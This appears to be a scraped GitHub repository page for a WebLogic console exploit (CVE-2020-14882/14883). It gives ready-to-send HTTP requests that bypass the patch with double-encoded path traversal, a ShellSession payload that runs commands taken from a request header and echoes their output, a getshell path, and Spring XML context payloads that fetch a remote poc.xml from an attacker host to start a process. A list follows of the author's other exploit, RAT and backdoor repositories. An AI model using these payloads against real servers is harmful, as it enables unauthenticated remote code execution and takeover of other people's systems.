• Stars
    star
    277
  • Rank 148,875 (Top 3 %)
  • Language
  • Created about 4 years ago
  • Updated over 1 year ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

CVE-2020–14882、CVE-2020–14883

CVE-2020–14882 Weblogic Unauthorized bypass RCE

bypass patch with CVE-2020–14882

private static final String[] IllegalUrl = new String[]{";", "%252E%252E", "%2E%2E", "..", "%3C", "%3E", "<", ">"};

list

%252E%252E
%2E%2E
..
%3E
%3C
;
<
>

lower

>>> "%252E%252E%252F".lower()
'%252e%252e%252f'

%252E%252E%252F to %252e%252e%252f

/console/css/%252e%252e%252fconsole.portal

╰─$ grep -rn 'IllegalUrl' *
console.jar/com/bea/console/utils/MBeanUtilsInitSingleFileServlet.java:19:   private static final String[] IllegalUrl = new String[]{";", "%252E%252E", "%2E%2E", "..", "%3C", "%3E", "<", ">"};
console.jar/com/bea/console/utils/MBeanUtilsInitSingleFileServlet.java:40:         for(int i = 0; i < IllegalUrl.length; ++i) {
console.jar/com/bea/console/utils/MBeanUtilsInitSingleFileServlet.java:41:            if (url.contains(IllegalUrl[i])) {
package com.bea.console.utils;

import com.bea.netuix.servlets.manager.SingleFileServlet;
import java.io.IOException;
import javax.servlet.ServletConfig;
import javax.servlet.ServletException;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import org.apache.commons.logging.Log;
import org.apache.commons.logging.LogFactory;

public class MBeanUtilsInitSingleFileServlet extends SingleFileServlet {
   private static final Log LOG = LogFactory.getLog(MBeanUtilsInitSingleFileServlet.class);
   private static final String WL_DISPATCH_POLICY = "wl-dispatch-policy";
   private static boolean hasInited = false;
   private static final long serialVersionUID = 1L;
   private static final String[] IllegalUrl = new String[]{";", "%252E%252E", "%2E%2E", "..", "%3C", "%3E", "<", ">"};

   public static void initMBean() {
      MBeanUtilsInitializer.initMBeanAsynchronously();
   }

   public void init(ServletConfig config) throws ServletException {
      ConsoleWorkManagerUtils.init(config.getInitParameter("wl-dispatch-policy"));
      super.init(config);
   }

   public void service(ServletRequest req, ServletResponse resp) throws ServletException, IOException {
      if (!hasInited) {
         initMBean();
         hasInited = true;
      }

      if (req instanceof HttpServletRequest) {
         HttpServletRequest httpServletRequest = (HttpServletRequest)req;
         String url = httpServletRequest.getRequestURI();

         for(int i = 0; i < IllegalUrl.length; ++i) {
            if (url.contains(IllegalUrl[i])) {
               if (resp instanceof HttpServletResponse) {
                  LOG.error("Invalid request URL detected. ");
                  HttpServletResponse httpServletResponse = (HttpServletResponse)resp;
                  httpServletResponse.sendError(404);
               }

               return;
            }
         }
      }

      try {
         super.service(req, resp);
      } catch (IllegalStateException var7) {
         if (LOG.isDebugEnabled()) {
            LOG.debug(var7);
         }
      } catch (IOException var8) {
         if (LOG.isDebugEnabled()) {
            LOG.debug(var8);
         }
      }

   }
}

CVE-2020-14750 patch.png

consoleapp/webapp/WEB-INF/lib/console.jar/com/bea/console/utils/MBeanUtilsInitSingleFileServlet.java

         for(int i = 0; i < IllegalUrl.length; ++i) {
            if (url.contains(IllegalUrl[i])) {
               if (resp instanceof HttpServletResponse) {
                  LOG.error("Invalid request URL detected. ");
                  HttpServletResponse httpServletResponse = (HttpServletResponse)resp;
                  httpServletResponse.sendError(404);
               }

               return;
            }
         }
ConsoleUtils.isUserAuthenticated(httpServletRequest)
      if (req instanceof HttpServletRequest) {
         HttpServletRequest httpServletRequest = (HttpServletRequest)req;
         String url = httpServletRequest.getRequestURI();
         if (!ConsoleUtils.isUserAuthenticated(httpServletRequest)) {
            throw new ServletException("User not authenticated.");
         }

         if (!this.isValidUrl(url, httpServletRequest)) {
            if (resp instanceof HttpServletResponse) {
               LOG.error("Invalid request URL detected.");
               HttpServletResponse httpServletResponse = (HttpServletResponse)resp;
               httpServletResponse.sendError(404);
            }

            return;
         }
      }
   private boolean isValidUrl(String url, HttpServletRequest req) {
      String consoleContextPath = ConsoleUtils.getConsoleContextPath();
      List portalList = ConsoleUtils.getConsolePortalList();
      Iterator var5 = portalList.iterator();

      String tmp;
      do {
         if (!var5.hasNext()) {
            return false;
         }

         String portal = (String)var5.next();
         tmp = "/" + consoleContextPath + portal;
      } while(!url.equals(tmp));

      return true;
   }

ConsoleUtils.getConsolePortalList

   public static List getConsolePortalList() {
      if (consolePortalList == null) {
         consolePortalList = new ArrayList();
         consolePortalList.add("/console.portal");
         consolePortalList.add("/consolejndi.portal");
         String validPortalNames = System.getProperty("weblogic.console.validPortalNames");
         if (!StringUtils.isEmptyString(validPortalNames)) {
            String[] vArray = validPortalNames.split(",");

            for(int i = 0; i < vArray.length; ++i) {
               consolePortalList.add(vArray[i]);
            }
         }
      }

      return consolePortalList;
   }

Command Echo For Weblogic 12.2.1.4.0

e.g.

cmd: chcp 65001&&whoami&&ipconfig

Burpsuite

POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1
Host: 172.16.242.134:7001
cmd: chcp 65001&&whoami&&ipconfig
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 1258

_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread();
weblogic.work.WorkAdapter adapter = executeThread.getCurrentWork();
java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");
field.setAccessible(true);
Object obj = field.get(adapter);
weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod("getServletRequest").invoke(obj);
String cmd = req.getHeader("cmd");
String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};
if (cmd != null) {
    String result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter("\\A").next();
    weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) req.getClass().getMethod("getResponse").invoke(req);
    res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));
    res.getServletOutputStream().flush();
    res.getWriter().write("");
}executeThread.interrupt();
");

回显参考链接:

https://xz.aliyun.com/t/5299
https://github.com/feihong-cs/Java-Rce-Echo/blob/master/weblogic/code/WeblogicEcho.jsp
https://mp.weixin.qq.com/s/u8cZEcku-uIbGAVAcos5Tw

回显payload

weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread();
weblogic.work.WorkAdapter adapter = executeThread.getCurrentWork();
java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");
field.setAccessible(true);
Object obj = field.get(adapter);
weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod("getServletRequest").invoke(obj);
String cmd = req.getHeader("cmd");
String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};
if (cmd != null) {
    String result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter("\\A").next();
    weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) req.getClass().getMethod("getResponse").invoke(req);
    res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));
    res.getServletOutputStream().flush();
    res.getWriter().write("");
}
executeThread.interrupt();

ShellSession

coherence-rest.jar#com.tangosol.coherence.mvel2.sh.ShellSession

Payload

POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1
Host: 172.16.242.134:7001
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 117

_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('calc.exe');");

Getshell

ROOT_PATH= C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain\

Shell_path= ../../../wlserver/server/lib/consoleapp/webapp/images/xxx.jsp

asciicast

FileSystemXmlApplicationContext

com.bea.core.repackaged.springframework.spring.jar#com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext

POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1
Host: 172.16.242.134:7001
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 155

_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://172.16.242.1:8989/poc.xml")

poc.xml

python -m SimpleHTTPServer

python -m pyftpdlib

<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
  <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
    <constructor-arg>
      <list>
        <value>cmd</value>
        <value>/c</value>
        <value><![CDATA[calc]]></value>
      </list>
    </constructor-arg>
  </bean>
</beans>

ClassPathXmlApplicationContext

com.bea.core.repackaged.springframework.spring.jar#com.bea.core.repackaged.springframework.context.support.ClassPathXmlApplicationContext

POST /console/images/%252E%252E%252Fconsole.portal HTTP/1.1
Host: 192.168.28.128:7001
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 161

_nfpb=true&_pageLabel=HomePage1&handle=com.bea.core.repackaged.springframework.context.support.ClassPathXmlApplicationContext("http://172.16.242.1:8989/poc.xml")

patch for CVE-2020–14882

no patch

C:\Oracle\Middleware\Oracle_Home\wlserver\server\lib\consoleapp\webapp\WEB-INF\lib\console.jar

com.bea.console.utils.MBeanUtilsInitSingleFileServlet

patch bypass notice for CVE-2020-14882

[Vulnerability warning] WebLogic console remote execution vulnerability (CVE-2020-14882) patch bypasses 0day

https://help.aliyun.com/noticelist/articleid/1060738870.html

vuln version

WebLogic 10.3.6.0.0

WebLogic 12.1.3.0.0

WebLogic 12.2.1.3.0

WebLogic 12.2.1.4.0

WebLogic 14.1.1.0.0

参考链接

https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf

https://www.oracle.com/security-alerts/cpuoct2020.html

More Repositories

1

0day-security-software-vulnerability-analysis-technology

0day安全_软件漏洞分析技术
C
547
star
2

IDA_Pro_7.2

IDA_Pro_7.2
Shell
487
star
3

oracleShell

oracle 数据库命令执行
439
star
4

Log4j2-CVE-2021-44228

Remote Code Injection In Log4j
434
star
5

CVE-2020-5902

CVE-2020-5902 BIG-IP
Java
376
star
6

Grafana-CVE-2021-43798

Grafana Unauthorized arbitrary file reading vulnerability
Go
329
star
7

St2-057

St2-057 Poc Example
Shell
314
star
8

CVE-2019-13272

Linux 4.10 < 5.1.17 PTRACE_TRACEME local root
C
301
star
9

CVE-2019-1388

CVE-2019-1388 UAC提权 (nt authority\system)
174
star
10

cve-2019-2618

Weblogic Upload Vuln(Need username password)-CVE-2019-2618
Python
170
star
11

OA-tongda-RCE

Office Anywhere网络智能办公系统
PHP
146
star
12

CVE-2019-3396

Confluence 未授权 RCE (CVE-2019-3396) 漏洞
Python
146
star
13

ncDecode

用友nc数据库密码解密
138
star
14

CVE-2018-17182

Linux 内核VMA-UAF 提权漏洞(CVE-2018-17182),0day
C
129
star
15

gitlab-SSRF-redis-RCE

GitLab 11.4.7 SSRF配合redis远程执行代码
Shell
120
star
16

2018-QWB-CTF

2018强网杯CTF___题目整理
Python
114
star
17

fuzz-wooyun-org

WooYun Fuzz 库
PHP
107
star
18

solr_rce

Apache Solr RCE via Velocity template
Python
104
star
19

OA-Seeyou

note
Java
104
star
20

CVE-2019-12409

Apache Solr RCE (ENABLE_REMOTE_JMX_OPTS="true")
Python
103
star
21

CVE-2019-11580

CVE-2019-11580 Atlassian Crowd and Crowd Data Center RCE
Python
101
star
22

CVE-2018-2628

Weblogic 反序列化漏洞(CVE-2018-2628)
Python
101
star
23

CVE-2019-12384

Jackson Rce For CVE-2019-12384
Ruby
98
star
24

SpringBoot_Actuator_RCE

SpringBoot_Actuator_RCE
96
star
25

CVE-2019-11043

php-fpm+Nginx RCE
Python
96
star
26

CVE-2019-11581

Atlassian JIRA Template injection vulnerability RCE
91
star
27

kibana-RCE

kibana < 6.6.0 未授权远程代码命令执行 (Need Timelion And Canvas),CVE-2019-7609
90
star
28

CVE-2019-0193

Apache Solr DataImport Handler RCE
Python
89
star
29

CVE-2020-8193

Citrix ADC Vulns
Python
85
star
30

CVE-2019-19781

Citrix ADC Remote Code Execution
Python
83
star
31

CVE-2020-2551

Weblogic RCE with IIOP
82
star
32

e-cology

e-cology OA_Beanshell_RCE
Java
80
star
33

zentao-getshell

禅道8.2 - 9.2.1前台Getshell
Python
79
star
34

CVE-2019-7238

Nexus Repository Manager 3 Remote Code Execution without authentication < 3.15.0
Python
77
star
35

jackson-CVE-2020-8840

FasterXML/jackson-databind 远程代码执行漏洞
Java
76
star
36

Redis-RCE

remote code execute for redis4 and redis5
Python
73
star
37

FinalShellDecodePass

FinalShellDecodePass 加密解密
Java
73
star
38

SHIRO-721

RememberMe Padding Oracle Vulnerability RCE
71
star
39

xxl-job

xxl-job RESTful API RCE
70
star
40

CVE-2019-0232

Apache Tomcat Remote Code Execution on Windows - CGI-BIN
Python
69
star
41

CVE-2019-16278

Directory transversal to remote code execution
Shell
69
star
42

Ubuntu-0day

all 4.4 ubuntu aws instances are vulnerable
C
66
star
43

CVE-2018-3191

Weblogic-CVE-2018-3191远程代码命令执行漏洞
Python
63
star
44

fastjson-RCE

fastjson-1.2.47
62
star
45

CVE-2019-2888

WebLogic EJBTaglibDescriptor XXE漏洞(CVE-2019-2888)
Java
59
star
46

Shiro_Xray

CommonsBeanutils1,CommonsCollectionsK1
Python
58
star
47

CVE-2019-15107

CVE-2019-15107 Webmin RCE (unauthorized)
Python
57
star
48

St2-052

St2-052
56
star
49

cve-2018-1273

Spring Data Commons RCE 远程命令执行漏洞
Python
56
star
50

CVE-2019-11510-1

SSL VPN Rce
Python
54
star
51

GitlabVer

gitlab version index
Shell
52
star
52

SHIRO-550

Shiro RememberMe 1.2.4 反序列化 漏洞
Python
52
star
53

webuploader-0.1.15-Demo

webuploader-v-0.1.15未授权-任意文件上传
52
star
54

BurpSuite_Pro_v1.7.37

Java
51
star
55

CVE-2020-17008

CVE-2020-17008 splWOW64 Elevation of Privilege
51
star
56

DBconfigReader

泛微ecology OA系统接口存在数据库配置信息泄露漏洞
50
star
57

SqlMap_BurpSuite

SqlMap_BurpSuite
Java
44
star
58

msfconsole-termux

How To Install Metasploit-Table on the Android Termux
Shell
42
star
59

CVE-2019-2890

CVE-2019-2890 WebLogic 反序列化RCE漏洞
41
star
60

cs_yara

check cs yara rules
YARA
40
star
61

st2-048

st2-048
Python
40
star
62

database-spring-ENC

sprint encode (plan text) get enc password
Java
39
star
63

mssql-command-tool

mssql 终端连接工具|命令执行
Go
38
star
64

BurpSuite-Plugin

Plugin For BurpSuite (Pentester)
JavaScript
38
star
65

fastjson-1.2.60-rce

autoType enable
36
star
66

Burp_AES_Plugin

Burpsuite Plugin For AES Crack
Java
35
star
67

mimikat_ssp

Security Support Provider Interface
C++
35
star
68

ThinkCMF_getshell

ThinkCMF 框架上的任意内容包含漏洞
Python
35
star
69

CVE-2020-10199

CVE-2020-10199、CVE-2020-10204、CVE-2020-11444
35
star
70

ChromePluginCrx

离线安装Chrome插件-插件备份
33
star
71

JWT_Brute

JWT_Brute
32
star
72

CVE-2020-1947

Apache ShardingSphere UI YAML解析远程代码执行漏洞
32
star
73

CVE-2019-15642

Webmin Remote Code Execution (authenticated)
Python
32
star
74

fastjson-1.2.61-RCE

fastjson-1.2.61-RCE
Java
32
star
75

CVE-2019-8451

Jira未授权SSRF漏洞
Python
31
star
76

fastjson-1.2.58-rce

fastjson-1.2.58-rce with h2 database
Java
31
star
77

Fortify_Rule

Decode Fortify Rule Bin File Get XML File
Java
29
star
78

CVE-2020-26259

CVE-2020-26259: XStream is vulnerable to an Arbitrary File Deletion on the local host when unmarshalling as long as the executing process has sufficient rights.
Java
28
star
79

IDA7.0-Pro

some people share IDA7.0!
25
star
80

S2-045-EXP-POC-TOOLS

S2-045 漏洞 POC-TOOLS CVE-2017-5638
Python
25
star
81

OpenFire_Decrypt

OpenFire 管理后台账号密码解密
Java
24
star
82

njRAT-0.7

远控工具Njrat
24
star
83

CVE-2018-14847

MikroTik RouterOS Winbox未经身份验证的任意文件读/写漏洞
Python
24
star
84

CVE-2019-20197

Nagios XI远程命令执行漏洞 <v5.6.9
23
star
85

CVE-2019-16759

vBulletin 5.x 未授权远程代码执行漏洞
Python
22
star
86

st2-046-poc

st2-046-poc CVE-2017-5638
Shell
22
star
87

Jboss_JMXInvokerServlet_Deserialization_RCE

Jboss_JMXInvokerServlet_Deserialization_RCE
21
star
88

CVE-2019-10392

CVE-2019-10392 RCE Jackson with Git Client Plugin 2.8.2 (Authenticated)
21
star
89

CVE-2018-10933

libssh CVE-2018-10933
Python
20
star
90

010-Editor-Template

20
star
91

Java-Compressed-file-security

java web 压缩文件 安全 漏洞
Python
19
star
92

Vmware_vCenter

VMware vCenter(Unauthenticated)
18
star
93

PHPStudy-Backdoor

phpstudy dll backdoor for v2016 and v2018
PHP
18
star
94

CVE-2019-3394

Confluence(<install-directory>/confluence/WEB-INF/)文件读取漏洞
17
star
95

CTF-RSA-tool

CTF-RSA-tool
C
17
star
96

Security_Article

scrapy website Article and link ...
HTML
17
star
97

Hscan

Hscan-Win-Gui
Python
16
star
98

CVE-2018-2894

Weblogic,CVE-2018-2894
Python
16
star
99

BurpSuite-icns

制作BurpSuite icns 在Mac OS上
16
star
100

phpweb

phpweb 前台任意文件上传
16
star